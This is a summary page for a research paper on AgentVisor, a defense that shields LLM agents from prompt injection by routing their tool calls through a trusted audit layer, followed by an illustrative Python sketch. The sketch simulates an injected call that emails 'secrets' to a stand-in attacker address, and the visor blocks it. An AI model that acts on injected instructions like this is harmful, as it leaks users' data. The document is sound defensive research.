AgentVisor: Defending LLM Agents Against Prompt Injection via Semantic Virtualization

Zonghao Ying; Haozheng Wang; Jiangfan Liu; Quanchen Zou; Aishan Liu; Jian Yang; Yaodong Yang; Xianglong Liu

arXiv:2604.24118 · cs.CR · April 28, 2026

TL;DR

AgentVisor is a defense framework inspired by OS virtualization. It enforces semantic privilege separation to protect LLM agents against prompt injection attacks while preserving task utility.

Contribution

The paper introduces semantic privilege separation, combined with an audit protocol and a self-correction mechanism, which reduces the attack success rate to 0.65% while utility decreases by only 1.45% compared to no defense.

Findings

01. Attack success rate reduced to 0.65%

02. Utility decreased by only 1.45% compared to no defense

03. Outperforms existing defense methods in balancing security and utility

Abstract

Large Language Model (LLM) agents are increasingly used to automate complex workflows, but integrating untrusted external data with privileged execution exposes them to severe security risks, particularly direct and indirect prompt injection. Existing defenses face significant challenges in balancing security with utility, often encountering a trade-off where rigorous protection leads to over-defense, or where subtle indirect injections bypass detection. Drawing inspiration from operating system virtualization, we propose AgentVisor, a novel defense framework that enforces semantic privilege separation. AgentVisor treats the target agent as an untrusted guest and intercepts tool calls via a trusted semantic visor. Central to our approach is a rigorous audit protocol grounded in classic OS security primitives, designed to systematically mitigate both direct and indirect injection…
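
The interception pattern described in the abstract (an untrusted guest agent whose tool calls pass through a trusted layer) can be illustrated with a minimal sketch. This is not the authors' implementation: the names `Visor`, `ToolCall`, `audit`, and `execute` are hypothetical, and the simple allowlist stands in for the paper's audit protocol, whose details are not given in this excerpt. Returning a denial to the guest instead of raising an error is likewise an assumption about how a guest might be given the chance to correct itself.

```python
from dataclasses import dataclass, field
from typing import Any, Callable


@dataclass(frozen=True)
class ToolCall:
    """A tool invocation proposed by the untrusted guest agent (hypothetical type)."""
    name: str
    args: dict[str, Any]


@dataclass
class Visor:
    """Hypothetical trusted layer that mediates every tool call from the guest."""
    tools: dict[str, Callable[..., Any]]
    # Tools the trusted user task may use (an assumed policy format).
    allowed: set[str]
    log: list[tuple[str, str]] = field(default_factory=list)

    def audit(self, call: ToolCall) -> tuple[bool, str]:
        # Placeholder check: a real audit would reason about the semantics of
        # the call, not only compare tool names against an allowlist.
        if call.name not in self.tools:
            return False, f"unknown tool: {call.name}"
        if call.name not in self.allowed:
            return False, f"tool not permitted for this task: {call.name}"
        return True, "ok"

    def execute(self, call: ToolCall) -> dict[str, Any]:
        ok, reason = self.audit(call)
        self.log.append((call.name, reason))
        if not ok:
            # The denial is returned rather than raised, so the guest can
            # revise its plan and continue with the original task.
            return {"status": "denied", "reason": reason}
        return {"status": "ok", "result": self.tools[call.name](**call.args)}


def read_file(path: str) -> str:
    # Stand-in tool for the example; it does not touch the filesystem.
    return f"contents of {path}"


def send_email(to: str, body: str) -> str:
    # Stand-in tool for the example; it does not send anything.
    return f"sent to {to}"


visor = Visor(
    tools={"read_file": read_file, "send_email": send_email},
    allowed={"read_file"},
)

# A call that matches the user's task passes the audit.
benign = visor.execute(ToolCall("read_file", {"path": "notes.txt"}))

# A call planted by injected content is blocked before it reaches the tool.
injected = visor.execute(
    ToolCall("send_email", {"to": "attacker@example.com", "body": "secrets"})
)
```

In this sketch the guest never holds a direct reference to the tools, so every side effect has to pass through `Visor.execute`. That single choke point is the property the virtualization analogy relies on.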
